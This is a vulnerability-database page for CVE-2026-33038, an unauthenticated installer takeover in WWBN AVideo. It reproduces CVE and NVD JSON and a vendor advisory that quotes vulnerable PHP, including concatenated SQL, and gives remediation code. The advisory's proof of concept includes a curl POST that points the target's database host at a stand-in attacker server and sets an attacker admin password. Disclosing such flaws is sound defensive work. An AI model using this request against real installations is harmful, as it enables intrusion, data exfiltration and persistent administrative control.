Vulnerability-Lookup

CVE-2026-33038 (GCVE-0-2026-33038)

Vulnerability from cvelistv5 – Published: 2026-03-20 05:35 – Updated: 2026-03-20 18:07

Title

AVideo affected by unauthenticated application takeover via exposed web installer on uninitialized deployments

Summary

WWBN AVideo is an open source video platform. Versions 25.0 and below are vulnerable to unauthenticated application takeover through the install/checkConfiguration.php endpoint. install/checkConfiguration.php performs full application initialization: database setup, admin account creation, and configuration file write, all from an unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access. This issue has been fixed in version 26.0.

Severity

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

SSVC

Exploitation: poc Automatable: no Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

CWE-306 - Missing Authentication for Critical Function

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
https://github.com/WWBN/AVideo/commit/b3fa7869dcb…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
WWBN	AVideo	Affected: < 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33038",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-20T16:28:13.379534Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-20T18:07:54.011Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. Versions 25.0 and below are vulnerable to unauthenticated application takeover through the install/checkConfiguration.php endpoint. install/checkConfiguration.php performs full application initialization: database setup, admin account creation, and configuration file write, all from an unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access. This issue has been fixed in version 26.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-306",
              "description": "CWE-306: Missing Authentication for Critical Function",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-20T05:35:56.812Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/b3fa7869dcb935c8ab5c001a88dc29d2f92cf8e1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/b3fa7869dcb935c8ab5c001a88dc29d2f92cf8e1"
        }
      ],
      "source": {
        "advisory": "GHSA-2f9h-23f7-8gcx",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo affected by unauthenticated application takeover via exposed web installer on uninitialized deployments"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33038",
    "datePublished": "2026-03-20T05:35:56.812Z",
    "dateReserved": "2026-03-17T18:10:50.210Z",
    "dateUpdated": "2026-03-20T18:07:54.011Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33038",
      "date": "2026-06-02",
      "epss": "0.00085",
      "percentile": "0.24608"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33038\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-20T06:16:11.983\",\"lastModified\":\"2026-03-23T16:24:08.187\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. Versions 25.0 and below are vulnerable to unauthenticated application takeover through the install/checkConfiguration.php endpoint. install/checkConfiguration.php performs full application initialization: database setup, admin account creation, and configuration file write, all from an unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access. This issue has been fixed in version 26.0.\"},{\"lang\":\"es\",\"value\":\"WWBN AVideo es una plataforma de video de c\u00f3digo abierto. Las versiones 25.0 e inferiores son vulnerables a una toma de control de aplicaci\u00f3n no autenticada a trav\u00e9s del endpoint install/checkConfiguration.php. install/checkConfiguration.php realiza la inicializaci\u00f3n completa de la aplicaci\u00f3n: configuraci\u00f3n de la base de datos, creaci\u00f3n de cuenta de administrador y escritura de archivo de configuraci\u00f3n, todo desde una entrada POST no autenticada. La \u00fanica protecci\u00f3n es verificar si videos/configuration.php ya existe. En despliegues no inicializados, cualquier atacante remoto puede completar la instalaci\u00f3n con credenciales controladas por el atacante y una base de datos controlada por el atacante, obteniendo acceso administrativo completo. Este problema ha sido solucionado en la versi\u00f3n 26.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.2,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-306\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"26.0\",\"matchCriteriaId\":\"B468F0CE-E5E7-4607-BD15-B5763C47493E\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/b3fa7869dcb935c8ab5c001a88dc29d2f92cf8e1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33038\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-20T16:28:13.379534Z\"}}}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-20T16:28:26.888Z\"}}], \"cna\": {\"title\": \"AVideo affected by unauthenticated application takeover via exposed web installer on uninitialized deployments\", \"source\": {\"advisory\": \"GHSA-2f9h-23f7-8gcx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/b3fa7869dcb935c8ab5c001a88dc29d2f92cf8e1\", \"name\": \"https://github.com/WWBN/AVideo/commit/b3fa7869dcb935c8ab5c001a88dc29d2f92cf8e1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. Versions 25.0 and below are vulnerable to unauthenticated application takeover through the install/checkConfiguration.php endpoint. install/checkConfiguration.php performs full application initialization: database setup, admin account creation, and configuration file write, all from an unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access. This issue has been fixed in version 26.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-306\", \"description\": \"CWE-306: Missing Authentication for Critical Function\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-20T05:35:56.812Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33038\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-20T18:07:54.011Z\", \"dateReserved\": \"2026-03-17T18:10:50.210Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-20T05:35:56.812Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33038

Vulnerability from fkie_nvd - Published: 2026-03-20 06:16 - Updated: 2026-03-23 16:24

Severity

8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/WWBN/AVideo/commit/b3fa7869dcb935c8ab5c001a88dc29d2f92cf8e1	Patch
security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "B468F0CE-E5E7-4607-BD15-B5763C47493E",
              "versionEndExcluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. Versions 25.0 and below are vulnerable to unauthenticated application takeover through the install/checkConfiguration.php endpoint. install/checkConfiguration.php performs full application initialization: database setup, admin account creation, and configuration file write, all from an unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access. This issue has been fixed in version 26.0."
    },
    {
      "lang": "es",
      "value": "WWBN AVideo es una plataforma de video de c\u00f3digo abierto. Las versiones 25.0 e inferiores son vulnerables a una toma de control de aplicaci\u00f3n no autenticada a trav\u00e9s del endpoint install/checkConfiguration.php. install/checkConfiguration.php realiza la inicializaci\u00f3n completa de la aplicaci\u00f3n: configuraci\u00f3n de la base de datos, creaci\u00f3n de cuenta de administrador y escritura de archivo de configuraci\u00f3n, todo desde una entrada POST no autenticada. La \u00fanica protecci\u00f3n es verificar si videos/configuration.php ya existe. En despliegues no inicializados, cualquier atacante remoto puede completar la instalaci\u00f3n con credenciales controladas por el atacante y una base de datos controlada por el atacante, obteniendo acceso administrativo completo. Este problema ha sido solucionado en la versi\u00f3n 26.0."
    }
  ],
  "id": "CVE-2026-33038",
  "lastModified": "2026-03-23T16:24:08.187",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-20T06:16:11.983",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/b3fa7869dcb935c8ab5c001a88dc29d2f92cf8e1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-306"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-2F9H-23F7-8GCX

Vulnerability from github – Published: 2026-03-17 19:46 – Updated: 2026-03-20 21:22

Summary

AVideo affected by unauthenticated application takeover via exposed web installer on uninitialized deployments

Details

Summary

The install/checkConfiguration.php endpoint performs full application initialization — database setup, admin account creation, and configuration file write — from unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access.

Affected Component

install/checkConfiguration.php — entire file (lines 1-273)

Description

No authentication or access restriction on installer endpoint

The checkConfiguration.php file performs the most privileged operations in the application — creating the database schema, the admin account, and the configuration file — with no authentication, no setup token, no CSRF protection, and no IP restriction. The sole guard is a file-existence check:

// install/checkConfiguration.php — lines 2-5
if (file_exists("../videos/configuration.php")) {
    error_log("Can not create configuration again: ".  json_encode($_SERVER));
    exit;
}

If videos/configuration.php does not exist (fresh deployment, container restart without persistent storage, re-deployment), the entire installer runs with attacker-controlled POST parameters.

Attacker-controlled database host eliminates credential guessing

Unlike typical installer exposure vulnerabilities where the attacker must guess the target's database credentials, this endpoint allows the attacker to supply their own database host:

// install/checkConfiguration.php — line 25
$mysqli = @new mysqli($_POST['databaseHost'], $_POST['databaseUser'], $_POST['databasePass'], "", $_POST['databasePort']);

The attacker can: 1. Run their own MySQL server with the AVideo schema pre-loaded 2. Set databaseHost to their server's IP 3. The connection succeeds (attacker controls the DB) 4. The configuration file is written pointing the application at the attacker's database permanently

Admin account creation with unsanitized input

The admin user is created with direct POST parameter concatenation into SQL:

// install/checkConfiguration.php — line 120
$sql = "INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', '"
     . $_POST['contactEmail'] . "', '" . md5($_POST['systemAdminPass']) . "', now(), now(), true)";

This has two issues: (1) the attacker controls the admin password, and (2) $_POST['contactEmail'] is directly concatenated into SQL without escaping (SQL injection).

Configuration file written with attacker-controlled values

The configuration file is written to disk with all attacker-supplied values embedded:

// install/checkConfiguration.php — lines 238-247
$videosDir = $_POST['systemRootPath'].'videos/';

if(!is_dir($videosDir)){
    mkdir($videosDir, 0777, true);
}

$fp = fopen("{$videosDir}configuration.php", "wb");
fwrite($fp, $content);
fclose($fp);

The $content variable (built at lines 188-236) embeds $_POST['databaseHost'], $_POST['databaseUser'], $_POST['databasePass'], $_POST['webSiteRootURL'], $_POST['systemRootPath'], and $_POST['salt'] directly into the PHP configuration file.

Inconsistent defense: CLI installer is protected, web endpoint is not

The CLI installer (install/install.php) properly restricts access:

// install/install.php — lines 3-5
if (!isCommandLineInterface()) {
    die('Command Line only');
}

The web endpoint (checkConfiguration.php) lacks any equivalent protection, creating an inconsistent defense pattern.

No web server protection on install directory

There is no .htaccess file in the install/ directory. The root .htaccess does not block access to install/. The endpoint is directly accessible at /install/checkConfiguration.php.

Execution chain

Attacker discovers an AVideo instance where videos/configuration.php does not exist (fresh or re-deployed)
Attacker sends POST to /install/checkConfiguration.php with their own database host, admin password, and site configuration
The script connects to the attacker's database (or the target's with guessed/default credentials)
Tables are created, admin user is inserted with attacker's password
configuration.php is written to disk, permanently configuring the application
Attacker logs in as admin with full control over the application

Proof of Concept

Step 1: Set up an attacker-controlled MySQL server with the AVideo schema:

# On attacker's server
mysql -e "CREATE DATABASE avideo;"
mysql avideo < database.sql  # Use AVideo's own schema file

Step 2: Send the installation request to the target:

curl -s -X POST https://TARGET/install/checkConfiguration.php \
  -d 'systemRootPath=/var/www/html/AVideo/' \
  -d 'databaseHost=ATTACKER_MYSQL_IP' \
  -d 'databasePort=3306' \
  -d 'databaseUser=attacker' \
  -d 'databasePass=attacker_pass' \
  -d 'databaseName=avideo' \
  -d 'createTables=1' \
  -d 'contactEmail=attacker@example.com' \
  -d 'systemAdminPass=AttackerPass123!' \
  -d 'webSiteTitle=Pwned' \
  -d 'mainLanguage=en_US' \
  -d 'webSiteRootURL=https://TARGET/'

Step 3: Log in as admin:

Username: admin
Password: AttackerPass123!

The attacker now has full administrative access. If using their own database, they control all application data.

Impact

Full application takeover: Attacker becomes the sole admin with complete control
Persistent backdoor via configuration: The videos/configuration.php file is written with attacker-controlled database credentials, ensuring persistent access even after the attack
Data exfiltration: If pointing to the attacker's database, all future user data (registrations, uploads, comments) flows to the attacker
Remote code execution potential: Admin access in AVideo enables file uploads and plugin management, which can lead to arbitrary PHP execution
SQL injection bonus: $_POST['contactEmail'] on line 120 is directly concatenated into SQL, allowing additional database manipulation

Recommended Remediation

Option 1: Add a one-time setup token (preferred)

Generate a random setup token during deployment that must be provided to complete installation:

// At the top of install/checkConfiguration.php, after the file_exists check:

// Require a setup token that was generated during deployment
$setupTokenFile = __DIR__ . '/../videos/.setup_token';
if (!file_exists($setupTokenFile)) {
    $obj = new stdClass();
    $obj->error = "Setup token file not found. Create videos/.setup_token with a random secret.";
    header('Content-Type: application/json');
    echo json_encode($obj);
    exit;
}

$expectedToken = trim(file_get_contents($setupTokenFile));
if (empty($_POST['setupToken']) || !hash_equals($expectedToken, $_POST['setupToken'])) {
    $obj = new stdClass();
    $obj->error = "Invalid setup token.";
    header('Content-Type: application/json');
    echo json_encode($obj);
    exit;
}

Option 2: Restrict installer to localhost/CLI only

Block web access to the installer entirely:

// At the top of install/checkConfiguration.php, after the file_exists check:
if (!isCommandLineInterface()) {
    $allowedIPs = ['127.0.0.1', '::1'];
    if (!in_array($_SERVER['REMOTE_ADDR'], $allowedIPs)) {
        header('Content-Type: application/json');
        echo json_encode(['error' => 'Installation is only allowed from localhost']);
        exit;
    }
}

Additionally, add an .htaccess file in the install/ directory:

# install/.htaccess
<Files "checkConfiguration.php">
    Require local
</Files>

Additional fixes needed

Parameterize SQL queries on line 120 to prevent SQL injection:

$stmt = $mysqli->prepare("INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', ?, ?, now(), now(), true)");
$hashedPass = md5($_POST['systemAdminPass']); // Also: upgrade from md5 to password_hash()
$stmt->bind_param("ss", $_POST['contactEmail'], $hashedPass);
$stmt->execute();

Upgrade password hashing from md5() to password_hash() with PASSWORD_BCRYPT or PASSWORD_ARGON2ID.

Credit

This vulnerability was discovered and reported by bugbunny.ai.

Severity

8.1 (High)


                  
                    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "25.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33038"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-17T19:46:40Z",
    "nvd_published_at": "2026-03-20T06:16:11Z",
    "severity": "HIGH"
  },
  "details": "## Summary\nThe `install/checkConfiguration.php` endpoint performs full application initialization \u2014 database setup, admin account creation, and configuration file write \u2014 from unauthenticated POST input. The only guard is checking whether `videos/configuration.php` already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access.\n\n## Affected Component\n- `install/checkConfiguration.php` \u2014 entire file (lines 1-273)\n\n## Description\n\n### No authentication or access restriction on installer endpoint\n\nThe `checkConfiguration.php` file performs the most privileged operations in the application \u2014 creating the database schema, the admin account, and the configuration file \u2014 with no authentication, no setup token, no CSRF protection, and no IP restriction. The sole guard is a file-existence check:\n\n```php\n// install/checkConfiguration.php \u2014 lines 2-5\nif (file_exists(\"../videos/configuration.php\")) {\n    error_log(\"Can not create configuration again: \".  json_encode($_SERVER));\n    exit;\n}\n```\n\nIf `videos/configuration.php` does not exist (fresh deployment, container restart without persistent storage, re-deployment), the entire installer runs with attacker-controlled POST parameters.\n\n### Attacker-controlled database host eliminates credential guessing\n\nUnlike typical installer exposure vulnerabilities where the attacker must guess the target\u0027s database credentials, this endpoint allows the attacker to supply their own database host:\n\n```php\n// install/checkConfiguration.php \u2014 line 25\n$mysqli = @new mysqli($_POST[\u0027databaseHost\u0027], $_POST[\u0027databaseUser\u0027], $_POST[\u0027databasePass\u0027], \"\", $_POST[\u0027databasePort\u0027]);\n```\n\nThe attacker can:\n1. Run their own MySQL server with the AVideo schema pre-loaded\n2. Set `databaseHost` to their server\u0027s IP\n3. The connection succeeds (attacker controls the DB)\n4. The configuration file is written pointing the application at the attacker\u0027s database permanently\n\n### Admin account creation with unsanitized input\n\nThe admin user is created with direct POST parameter concatenation into SQL:\n\n```php\n// install/checkConfiguration.php \u2014 line 120\n$sql = \"INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, \u0027admin\u0027, \u0027\"\n     . $_POST[\u0027contactEmail\u0027] . \"\u0027, \u0027\" . md5($_POST[\u0027systemAdminPass\u0027]) . \"\u0027, now(), now(), true)\";\n```\n\nThis has two issues: (1) the attacker controls the admin password, and (2) `$_POST[\u0027contactEmail\u0027]` is directly concatenated into SQL without escaping (SQL injection).\n\n### Configuration file written with attacker-controlled values\n\nThe configuration file is written to disk with all attacker-supplied values embedded:\n\n```php\n// install/checkConfiguration.php \u2014 lines 238-247\n$videosDir = $_POST[\u0027systemRootPath\u0027].\u0027videos/\u0027;\n\nif(!is_dir($videosDir)){\n    mkdir($videosDir, 0777, true);\n}\n\n$fp = fopen(\"{$videosDir}configuration.php\", \"wb\");\nfwrite($fp, $content);\nfclose($fp);\n```\n\nThe `$content` variable (built at lines 188-236) embeds `$_POST[\u0027databaseHost\u0027]`, `$_POST[\u0027databaseUser\u0027]`, `$_POST[\u0027databasePass\u0027]`, `$_POST[\u0027webSiteRootURL\u0027]`, `$_POST[\u0027systemRootPath\u0027]`, and `$_POST[\u0027salt\u0027]` directly into the PHP configuration file.\n\n### Inconsistent defense: CLI installer is protected, web endpoint is not\n\nThe CLI installer (`install/install.php`) properly restricts access:\n\n```php\n// install/install.php \u2014 lines 3-5\nif (!isCommandLineInterface()) {\n    die(\u0027Command Line only\u0027);\n}\n```\n\nThe web endpoint (`checkConfiguration.php`) lacks any equivalent protection, creating an inconsistent defense pattern.\n\n### No web server protection on install directory\n\nThere is no `.htaccess` file in the `install/` directory. The root `.htaccess` does not block access to `install/`. The endpoint is directly accessible at `/install/checkConfiguration.php`.\n\n### Execution chain\n\n1. Attacker discovers an AVideo instance where `videos/configuration.php` does not exist (fresh or re-deployed)\n2. Attacker sends POST to `/install/checkConfiguration.php` with their own database host, admin password, and site configuration\n3. The script connects to the attacker\u0027s database (or the target\u0027s with guessed/default credentials)\n4. Tables are created, admin user is inserted with attacker\u0027s password\n5. `configuration.php` is written to disk, permanently configuring the application\n6. Attacker logs in as admin with full control over the application\n\n## Proof of Concept\n\n**Step 1:** Set up an attacker-controlled MySQL server with the AVideo schema:\n\n```bash\n# On attacker\u0027s server\nmysql -e \"CREATE DATABASE avideo;\"\nmysql avideo \u003c database.sql  # Use AVideo\u0027s own schema file\n```\n\n**Step 2:** Send the installation request to the target:\n\n```bash\ncurl -s -X POST https://TARGET/install/checkConfiguration.php \\\n  -d \u0027systemRootPath=/var/www/html/AVideo/\u0027 \\\n  -d \u0027databaseHost=ATTACKER_MYSQL_IP\u0027 \\\n  -d \u0027databasePort=3306\u0027 \\\n  -d \u0027databaseUser=attacker\u0027 \\\n  -d \u0027databasePass=attacker_pass\u0027 \\\n  -d \u0027databaseName=avideo\u0027 \\\n  -d \u0027createTables=1\u0027 \\\n  -d \u0027contactEmail=attacker@example.com\u0027 \\\n  -d \u0027systemAdminPass=AttackerPass123!\u0027 \\\n  -d \u0027webSiteTitle=Pwned\u0027 \\\n  -d \u0027mainLanguage=en_US\u0027 \\\n  -d \u0027webSiteRootURL=https://TARGET/\u0027\n```\n\n**Step 3:** Log in as admin:\n\n```\nUsername: admin\nPassword: AttackerPass123!\n```\n\nThe attacker now has full administrative access. If using their own database, they control all application data.\n\n## Impact\n\n- **Full application takeover:** Attacker becomes the sole admin with complete control\n- **Persistent backdoor via configuration:** The `videos/configuration.php` file is written with attacker-controlled database credentials, ensuring persistent access even after the attack\n- **Data exfiltration:** If pointing to the attacker\u0027s database, all future user data (registrations, uploads, comments) flows to the attacker\n- **Remote code execution potential:** Admin access in AVideo enables file uploads and plugin management, which can lead to arbitrary PHP execution\n- **SQL injection bonus:** `$_POST[\u0027contactEmail\u0027]` on line 120 is directly concatenated into SQL, allowing additional database manipulation\n\n## Recommended Remediation\n\n### Option 1: Add a one-time setup token (preferred)\n\nGenerate a random setup token during deployment that must be provided to complete installation:\n\n```php\n// At the top of install/checkConfiguration.php, after the file_exists check:\n\n// Require a setup token that was generated during deployment\n$setupTokenFile = __DIR__ . \u0027/../videos/.setup_token\u0027;\nif (!file_exists($setupTokenFile)) {\n    $obj = new stdClass();\n    $obj-\u003eerror = \"Setup token file not found. Create videos/.setup_token with a random secret.\";\n    header(\u0027Content-Type: application/json\u0027);\n    echo json_encode($obj);\n    exit;\n}\n\n$expectedToken = trim(file_get_contents($setupTokenFile));\nif (empty($_POST[\u0027setupToken\u0027]) || !hash_equals($expectedToken, $_POST[\u0027setupToken\u0027])) {\n    $obj = new stdClass();\n    $obj-\u003eerror = \"Invalid setup token.\";\n    header(\u0027Content-Type: application/json\u0027);\n    echo json_encode($obj);\n    exit;\n}\n```\n\n### Option 2: Restrict installer to localhost/CLI only\n\nBlock web access to the installer entirely:\n\n```php\n// At the top of install/checkConfiguration.php, after the file_exists check:\nif (!isCommandLineInterface()) {\n    $allowedIPs = [\u0027127.0.0.1\u0027, \u0027::1\u0027];\n    if (!in_array($_SERVER[\u0027REMOTE_ADDR\u0027], $allowedIPs)) {\n        header(\u0027Content-Type: application/json\u0027);\n        echo json_encode([\u0027error\u0027 =\u003e \u0027Installation is only allowed from localhost\u0027]);\n        exit;\n    }\n}\n```\n\nAdditionally, add an `.htaccess` file in the `install/` directory:\n\n```apache\n# install/.htaccess\n\u003cFiles \"checkConfiguration.php\"\u003e\n    Require local\n\u003c/Files\u003e\n```\n\n### Additional fixes 